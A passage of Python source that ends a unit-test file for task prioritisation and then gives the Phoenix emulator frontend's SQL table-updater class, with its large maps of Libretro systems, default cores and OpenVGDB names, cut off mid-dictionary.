self.assertTrue(t1 in t2.prioritize_before)
# expect
self.assertRaises(Forbidden,
self.ll.do_remove_prioritize_after_from_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
def test_remove_prioritize_after_task_not_found_raises_exception(self):
# given
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertIsNone(self.pl.get_task(t2.id + 1))
# expect
self.assertRaises(NotFound,
self.ll.do_remove_prioritize_after_from_task,
t2.id + 1, t2.id, user)
# then
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
        self.assertIsNone(self.pl.get_task(t2.id + 1))
def test_remove_prioritize_after_when_not_found_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
self.pl.add(t1)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertIsNone(self.pl.get_task(t1.id + 1))
# expect
self.assertRaises(NotFound,
self.ll.do_remove_prioritize_after_from_task,
t1.id, t1.id + 1, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertIsNone(self.pl.get_task(t1.id + 1))
|
team-phoenix/Phoenix
|
frontend/python/updaters/sqlTableUpdater.py
|
import os
from collections import OrderedDict
from .sqldatabase import SqlDatabase
from .retrieve_core_info import retrieveCoreInfo
# Root class that all SQL table updaters derive from
class SqlTableUpdater():
    def __init__(self, tableName, tableColumns=None, coreInfo=None):
        self.tableName = tableName
        # Avoid shared mutable default arguments; fall back to fresh empties.
        self.columnsDict = OrderedDict(tableColumns if tableColumns is not None else [])
        self.dbFile = os.path.join(os.getcwd().replace("python", "metadata"), "libretro.sqlite")
        self.dbFileExists = os.path.isfile(self.dbFile)
        self.coreInfo = coreInfo if coreInfo is not None else {}
# self.filterUnusedCores()
def updateTable(self):
pass
def updateColumns(self, database, additionalStatement: str = ""):
if not self.dbFileExists:
database.createTable(self.tableName, self.columnsDict, additionalStatement)
        else:
            # The DB file already exists: drop any stale copy of the table,
            # then recreate it with the current schema.
            try:
                database.deleteTable(self.tableName)
            except:
                pass
            database.createTable(self.tableName, self.columnsDict, additionalStatement)
def __del__(self):
print("Updated " + self.tableName + " table.")
def libretroSystemList(self):
systems = []
for k, v in self.coreInfo['cores'].items():
if "categories" not in v or v["categories"] != "Emulator":
continue
if "database" in v:
name = v["database"].split("|")
for n in name:
systems.append(n)
# Split console and manufacturer names
# Not really necessary for Libretro identifiers
#tup = n.split(" - ")
#
## "MAME"
#if len(tup) == 1:
# systems.append(tup[0])
#
## Nearly every one
#elif len(tup) == 2:
# systems.append(tup[1])
#
## Sega - Master System - Mark III
## Sega - Mega Drive - Genesis
#elif len(tup) == 3:
# systems.append(tup[1])
# There are some cores that do not have "database" defined
elif "systemname" in v:
systems.append(v["systemname"])
systems = list(set(systems))
systems.sort()
return systems
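    # Illustrative result shape (for orientation; both IDs shown do appear in
    # the data below): a sorted, de-duplicated list of Libretro database
    # identifiers such as ["Nintendo - Game Boy", "Sega - 32X", ...].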
# This map defines all Libretro-based systems that Phoenix supports. If it isn't in here, it isn't supported by Phoenix!
# TODO: Place this information into an entirely separate database
# WARNING: Do NOT change Phoenix UUIDs (1st column), even if there are spelling mistakes. Change friendlyName if you really need to.
phoenixSystemDatabase = {
# friendlyName: North American console name without manufacturer
# shortName: Abbreviation (typically 3 letters)
# enabled: True iff a core is available, Phoenix can run it, and the game scanner can find it (extensions set)
# Everything else
"Arcade": {"enabled": False, "defaultCore": "mame_libretro", "friendlyName": "", "shortName": "", "manufacturer": "(Various)" },
# Conspicuously missing from No-Intro
"Amstrad - CPC": {"enabled": False, "defaultCore": "cap32_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Amstrad" },
"Atari - 2600": {"enabled": True, "defaultCore": "stella_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Capcom - CP System I": {"enabled": False, "defaultCore": "fb_alpha_cps1_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"Capcom - CP System II": {"enabled": False, "defaultCore": "fb_alpha_cps2_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"Capcom - CP System III": {"enabled": False, "defaultCore": "fbalpha2012_cps3_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"Capcom - CPS Changer": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"CHIP-8": {"enabled": False, "defaultCore": "emux_chip8_libretro", "friendlyName": "", "shortName": "", "manufacturer": "(Various)" },
"DOS": {"enabled": False, "defaultCore": "dosbox_libretro", "friendlyName": "", "shortName": "", "manufacturer": "(Various)" },
"Mattel - Intellivision": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Mattel" },
"Nintendo - Game & Watch": {"enabled": False, "defaultCore": "gw_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Sinclair - ZX81": {"enabled": False, "defaultCore": "81_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sinclair" },
"SNK - Neo Geo": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "SNK" },
# No-Intro, both official and non-official (ROM-based games)
"Atari - 5200": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - 7800": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - Jaguar": {"enabled": True, "defaultCore": "virtualjaguar_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - Lynx": {"enabled": True, "defaultCore": "mednafen_lynx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - ST": {"enabled": True, "defaultCore": "hatari_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Bandai - WonderSwan Color": {"enabled": True, "defaultCore": "mednafen_wswan_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Bandai" },
"Bandai - WonderSwan": {"enabled": True, "defaultCore": "mednafen_wswan_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Bandai" },
"Casio - Loopy": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Casio" },
"Casio - PV-1000": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Casio" },
"Coleco - ColecoVision": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Coleco" },
#"Commodore - 64 (PP)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
#"Commodore - 64 (Tapes)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Commodore - 64": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Commodore - Amiga": {"enabled": True, "defaultCore": "puae_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Commodore - Plus-4": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Commodore - VIC-20": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Emerson - Arcadia 2001": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Emerson" },
"Entex - Adventure Vision": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Entex" },
"Epoch - Super Cassette Vision": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Epoch" },
"Fairchild - Channel F": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Fairchild" },
"Funtech - Super Acan": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Funtech" },
"GamePark - GP32": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "GamePark" },
"GCE - Vectrex": {"enabled": True, "defaultCore": "vecx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "GCE" },
"Hartung - Game Master": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Hartung" },
"LeapFrog - Leapster Learning Game System": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "LeapFrog" },
"Magnavox - Odyssey2": {"enabled": False, "defaultCore": "o2em_libretro", "friendlyName": u"Odyssey²", "shortName": "", "manufacturer": "Magnavox" },
"Microsoft - MSX 2": {"enabled": False, "defaultCore": "bluemsx_libretro", "friendlyName": "MSX2", "shortName": "", "manufacturer": "Microsoft" },
"Microsoft - MSX": {"enabled": False, "defaultCore": "bluemsx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
#"Microsoft - XBOX 360 (DLC)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
#"Microsoft - XBOX 360 (Games on Demand)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
#"Microsoft - XBOX 360 (Title Updates)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
"NEC - PC Engine - TurboGrafx 16": {"enabled": True, "defaultCore": "mednafen_pce_fast_libretro", "friendlyName": "TurboGrafx 16", "shortName": "", "manufacturer": "NEC" },
"NEC - Super Grafx": {"enabled": True, "defaultCore": "mednafen_supergrafx_libretro", "friendlyName": "SuperGrafx", "shortName": "", "manufacturer": "NEC" },
#"Nintendo - Famicom Disk System": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Game Boy Advance (e-Cards)": {"enabled": True, "defaultCore": "vbam_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Game Boy Advance": {"enabled": True, "defaultCore": "vbam_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Game Boy Color": {"enabled": True, "defaultCore": "gambatte_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Game Boy": {"enabled": True, "defaultCore": "gambatte_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
#"Nintendo - New Nintendo 3DS (DLC)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - New Nintendo 3DS": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
#"Nintendo - Nintendo 3DS (DLC)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Nintendo 3DS": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Nintendo 64": {"enabled": True, "defaultCore": "mupen64plus_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
#"Nintendo - Nintendo DS (Download Play) (BETA)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Nintendo DS": {"enabled": True, "defaultCore": "desmume_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
#"Nintendo - Nintendo DSi (DLC)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Nintendo DSi": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Nintendo Entertainment System": {"enabled": True, "defaultCore": "fceumm_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
#"Nintendo - Nintendo Wii (DLC)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Pokemon Mini": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Satellaview": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Sufami Turbo": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Super Nintendo Entertainment System": {"enabled": True, "defaultCore": "bsnes_mercury_balanced_libretro", "friendlyName": "Super Nintendo", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Virtual Boy": {"enabled": True, "defaultCore": "mednafen_vb_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nokia - N-Gage": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nokia" },
"Philips - Videopac+": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Philips" },
"RCA - Studio II": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "RCA" },
"Sega - 32X": {"enabled": True, "defaultCore": "picodrive_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - Game Gear": {"enabled": True, "defaultCore": "genesis_plus_gx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - Master System - Mark III": {"enabled": False, "defaultCore": "emux_sms_libretro", "friendlyName": "Master System", "shortName": "", "manufacturer": "Sega" },
"Sega - Mega Drive - Genesis": {"enabled": True, "defaultCore": "genesis_plus_gx_libretro", "friendlyName": "Genesis", "shortName": "", "manufacturer": "Sega" },
"Sega - PICO": {"enabled": True, "defaultCore": "picodrive_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - SG-1000": {"enabled": True, "defaultCore": "genesis_plus_gx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sinclair - ZX Spectrum +3": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sinclair" },
"SNK - Neo Geo Pocket Color": {"enabled": True, "defaultCore": "mednafen_ngp_libretro", "friendlyName": "", "shortName": "", "manufacturer": "SNK" },
"SNK - Neo Geo Pocket": {"enabled": True, "defaultCore": "mednafen_ngp_libretro", "friendlyName": "", "shortName": "", "manufacturer": "SNK" },
#"Sony - PlayStation 3 (DLC)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
#"Sony - PlayStation 3 (Downloadable)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
#"Sony - PlayStation 3 (PSN)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
#"Sony - PlayStation Portable (DLC)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
#"Sony - PlayStation Portable (PSN)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
#"Sony - PlayStation Portable (PSX2PSP)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
#"Sony - PlayStation Portable (UMD Music)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
#"Sony - PlayStation Portable (UMD Video)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
"Sony - PlayStation Portable": {"enabled": True, "defaultCore": "ppsspp_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
"Tiger - Game.com": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Tiger" },
"Tiger - Gizmondo": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Tiger" },
"VTech - CreatiVision": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "VTech" },
"VTech - V.Smile": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "VTech" },
"Watara - Supervision": {"enabled": True, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Watara" },
# Redump.org (disc-based games)
"Apple - Macintosh": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Apple" },
"Bandai - Playdia": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Bandai" },
"Bandai / Apple - Pippin": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Bandai / Apple" },
"Commodore - Amiga CD": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Commodore - Amiga CD32": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Commodore - Amiga CDTV": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Fujitsu - FM Towns series": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Fujitsu" },
"IBM PC compatible": {"enabled": False, "defaultCore": "", "friendlyName": "PC", "shortName": "", "manufacturer": "(Various)" },
"Mattel - HyperScan": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Mattel" },
"Microsoft - Xbox": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
"Namco / Sega / Nintendo - Triforce": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"NEC - PC Engine CD - TurboGrafx-CD": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "TurboGrafx-CD", "shortName": "", "manufacturer": "NEC" },
"NEC - PC-88 series": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "NEC" },
"NEC - PC-98 series": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "NEC" },
"NEC - PC-FX - PC-FXGA": {"enabled": False, "defaultCore": "mednafen_pcfx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "NEC" },
"Nintendo - GameCube": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Palm OS": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Palm" },
"Panasonic - 3DO Interactive Multiplayer": {"enabled": False, "defaultCore": "4do_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Panasonic" },
"Philips - CD-i": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Philips" },
"Photo - CD": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "(Various)" },
"Sega - Chihiro": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - Dreamcast": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - Lindbergh": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - Mega-CD": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - Naomi": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - Saturn": {"enabled": True, "defaultCore": "yabause_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"SNK - Neo Geo CD": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "SNK" },
"Sony - PlayStation 2": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
"Sony - PlayStation": {"enabled": True, "defaultCore": "mednafen_psx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
"VTech - V.Flash": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "VTech" },
# Seventh-generation consoles (circa 2005)
"Microsoft - Xbox 360": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
"Nintendo - Wii": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Sony - PlayStation 3": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
# Eighth-generation consoles (circa 2012)
"Microsoft - Xbox One": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
"Nintendo - Wii U": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Sony - PlayStation 4": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
# Ninth-generation consoles (circa 2017)
"Microsoft - Xbox One X": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
"Nintendo - Switch": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
}
def phoenixSystems(self):
return OrderedDict(sorted(self.phoenixSystemDatabase.items(), key=lambda t: t[0]))
def libretroToPhoenix(self, libretroSystem):
return self.libretroToPhoenixMap[libretroSystem]
# This map essentially says "Register this Libretro core for this (these) Phoenix system(s)" when a .info file claims support for that system
# If a core claims support for some Libretro ID, register that core for each Phoenix ID
libretroToPhoenixMap = {
"3DO": {"Panasonic - 3DO Interactive Multiplayer"},
"Arcade (various)": {"Arcade"},
"Atari - 2600": {"Atari - 2600"},
"Atari - 5200": {"Atari - 5200"},
"Atari - 7800": {"Atari - 7800"},
"Atari - Jaguar": {"Atari - Jaguar"},
"Atari - Lynx": {"Atari - Lynx"},
"Atari ST/STE/TT/Falcon": {"Atari - ST"},
"Bandai - WonderSwan Color": {"Bandai - WonderSwan Color"},
"Bandai - WonderSwan": {"Bandai - WonderSwan"},
"CHIP-8": {"CHIP-8"},
"Commodore Amiga": {"Commodore - Amiga"},
"Commodore - C128": {"Arcade"},
"Commodore - 64": {"Commodore - 64"},
"CP System I": {"Capcom - CP System I"},
"CP System II": {"Capcom - CP System II"},
"CP System III": {"Capcom - CP System III"},
"CPC": {"Amstrad - CPC"},
"DOS": {"DOS"},
"FB Alpha - Arcade Games": {"Arcade"},
"GCE - Vectrex": {"GCE - Vectrex"},
"Handheld Electronic Game": {"Nintendo - Game & Watch"},
"IBM PC compatible": {"IBM PC compatible"},
"Magnavox - Odyssey2": {"Magnavox - Odyssey2"},
"MAME": {"Arcade"},
"MAME2003": {"Arcade"},
"Microsoft - MSX 2": {"Microsoft - MSX 2"},
"Microsoft - MSX2": {"Microsoft - MSX 2"},
"Microsoft - MSX": {"Microsoft - MSX"},
# MESS and UME
# http://nonmame.retrogames.com/
"MULTI (various)": {
"Atari - 2600",
"Atari - 5200",
"Atari - 7800",
"Atari - Lynx",
"Bandai - WonderSwan Color"
"Bandai - WonderSwan",
"Capcom - CPS Changer",
"Coleco - ColecoVision",
"Fujitsu - FM Towns series",
"Magnavox - Odyssey2",
"Mattel - Intellivision",
"NEC - PC Engine - TurboGrafx 16",
"NEC - PC Engine CD - TurboGrafx-CD",
"NEC - Super Grafx",
"Nintendo - Game Boy Advance",
"Nintendo - Game Boy",
"Philips - Videopac+",
"RCA - Studio II",
"Sega - Game Gear",
"Sega - Master System - Mark III",
"Sega - Mega Drive - Genesis",
"Sega - PICO",
"Sega - SG-1000",
"SNK - Neo Geo CD",
"SNK - Neo Geo",
"Watara - Supervision",
},
"NEC - PC Engine - TurboGrafx 16": {"NEC - PC Engine - TurboGrafx 16"},
"NEC - PC Engine SuperGrafx": {"NEC - Super Grafx"},
"NEC - PC Engine CD - TurboGrafx-CD": {"NEC - Super Grafx"},
"NEC - PC-FX": {"NEC - PC-FX - PC-FXGA"},
"NEC - Super Grafx": {"NEC - Super Grafx"},
"Neo Geo": {"SNK - Neo Geo"},
"Nintendo - 3DS": {"Nintendo - Nintendo 3DS"},
"Nintendo - Family Computer Disk System": {"Nintendo - Nintendo Entertainment System"},
"Nintendo - Famicom Disk System": {"Nintendo - Nintendo Entertainment System"},
"Nintendo - Game & Watch": {"Nintendo - Game & Watch"},
"Nintendo - Game Boy Advance (e-Cards)": {"Nintendo - Game Boy Advance (e-Cards)"},
"Nintendo - Game Boy Advance": {"Nintendo - Game Boy Advance"},
"Nintendo - Game Boy Color": {"Nintendo - Game Boy Color"},
"Nintendo - Game Boy": {"Nintendo - Game Boy"},
"Nintendo - GameCube": {"Nintendo - GameCube"},
"Nintendo - Nintendo 64": {"Nintendo - Nintendo 64"},
"Nintendo - Nintendo 64DD": {"Nintendo - Nintendo 64"},
"Nintendo - Nintendo DS": {"Nintendo - Nintendo DS"},
"Nintendo - Nintendo DS (Download Play)": {"Nintendo - Nintendo DS"},
"Nintendo - Nintendo DS (Download Play) (BETA)": {"Nintendo - Nintendo DS"},
"Nintendo - Nintendo DS Decrypted": {"Nintendo - Nintendo DS"},
"Nintendo - Nintendo Entertainment System": {"Nintendo - Nintendo Entertainment System"},
"Nintendo - Pokemon Mini": {"Nintendo - Pokemon Mini"},
"Nintendo - Sufami Turbo": {"Nintendo - Sufami Turbo"},
"Nintendo - Super Nintendo Entertainment System": {"Nintendo - Super Nintendo Entertainment System"},
"Nintendo - Virtual Boy": {"Nintendo - Virtual Boy"},
"Nintendo - Wii": {"Nintendo - Wii"},
"PC": {"IBM PC compatible"},
"PC-FX": {"NEC - PC-FX - PC-FXGA"},
"PC-98": {"NEC - PC-98 series"},
"Phillips - Videopac+": {"Philips - Videopac+"},
"Sega - 32X": {"Sega - 32X"},
"Sega - Dreamcast": {"Sega - Dreamcast"},
"Sega - Game Gear": {"Sega - Game Gear"},
"Sega - Master System - Mark III": {"Sega - Master System - Mark III"},
"Sega - Mega Drive - Genesis": {"Sega - Mega Drive - Genesis"},
"Sega - Mega-CD - Sega CD": {"Sega - Mega-CD"},
"Sega - NAOMI": {"Sega - Naomi"},
"Sega - PICO": {"Sega - PICO"},
"Sega - Saturn": {"Sega - Saturn"},
"Sega - SG-1000": {"Sega - SG-1000"},
"Sharp - X68000": {"Arcade"},
"Sinclair - ZX 81": {"Sinclair - ZX81"},
"Sinclair - ZX Spectrum": {"Sinclair - ZX Spectrum +3"},
"Sinclair - ZX Spectrum +3": {"Sinclair - ZX Spectrum +3"},
"SNK - Neo Geo Pocket Color": {"SNK - Neo Geo Pocket Color"},
"SNK - Neo Geo Pocket": {"SNK - Neo Geo Pocket"},
"Sony - PlayStation Portable": {"Sony - PlayStation Portable"},
"Sony - PlayStation": {"Sony - PlayStation"},
"The 3DO Company - 3DO": {"Panasonic - 3DO Interactive Multiplayer"},
"Uzebox": {"Arcade"},
"ZX Spectrum (various)": {"Sinclair - ZX Spectrum +3"},
}
    # Not all Phoenix IDs are available in OpenVGDB; fail silently and gracefully if a match isn't found
def phoenixToOpenVGDB(self, phoenixID):
ret = ""
try:
ret = self.phoenixToOpenVGDBMap[phoenixID]
except KeyError:
ret = ""
return ret
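    # Illustrative calls (the first value comes from the map below; the second
    # key is a made-up ID that exercises the fallback):
    #   self.phoenixToOpenVGDB("Sega - Saturn")  -> "Sega Saturn"
    #   self.phoenixToOpenVGDB("Not A System")   -> ""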
phoenixToOpenVGDBMap = {
"Panasonic - 3DO Interactive Multiplayer": "3DO Interactive Multiplayer",
"Arcade": "Arcade",
"Atari - 2600": "Atari 2600",
"Atari - 5200": "Atari 5200",
"Atari - 7800": "Atari 7800",
"Atari - Jaguar": "Atari Jaguar CD",
"Atari - Jaguar": "Atari Jaguar",
"Atari - Lynx": "Atari Lynx",
"Bandai - WonderSwan Color": "Bandai WonderSwan Color",
"Bandai - WonderSwan": "Bandai WonderSwan",
"Coleco - ColecoVision": "Coleco ColecoVision",
"GCE - Vectrex": "GCE Vectrex",
"Mattel - Intellivision": "Intellivision",
"Magnavox - Odyssey2": "Magnavox Odyssey2",
"NEC - PC Engine CD - TurboGrafx-CD": "NEC PC Engine CD/TurboGrafx-CD",
"NEC - PC Engine - TurboGrafx 16": "NEC PC Engine/TurboGrafx-16",
"NEC - PC-FX - PC-FXGA": "NEC PC-FX",
"NEC - Super Grafx": "NEC SuperGrafx",
"Nintendo - Nintendo 64": "Nintendo 64",
"Nintendo - Nintendo DS": "Nintendo DS",
"Nintendo - Nintendo Entertainment System": "Nintendo Entertainment System",
"Nintendo - Nintendo Entertainment System": "Nintendo Famicom Disk System",
"Nintendo - Game Boy Advance": "Nintendo Game Boy Advance",
"Nintendo - Game Boy Color": "Nintendo Game Boy Color",
"Nintendo - Game Boy": "Nintendo Game Boy",
"Nintendo - GameCube": "Nintendo GameCube",
"Nintendo - Super Nintendo Entertainment System": "Nintendo Super Nintendo Entertainment System",
"Nintendo - Virtual Boy": "Nintendo Virtual Boy",
"Nintendo - Wii": "Nintendo Wii",
"Sega - 32X": "Sega 32X",
"Sega - Mega-CD": "Sega CD/Mega-CD",
"Sega - Game Gear": "Sega Game Gear",
"Sega - Mega Drive - Genesis": "Sega Genesis/Mega Drive",
"Sega - Master System - Mark III": "Sega Master System",
"Sega - Saturn": "Sega Saturn",
"Sega - SG-1000": "Sega SG-1000",
"SNK - Neo Geo Pocket Color": "SNK Neo Geo Pocket Color",
"SNK - Neo Geo Pocket": "SNK Neo Geo Pocket",
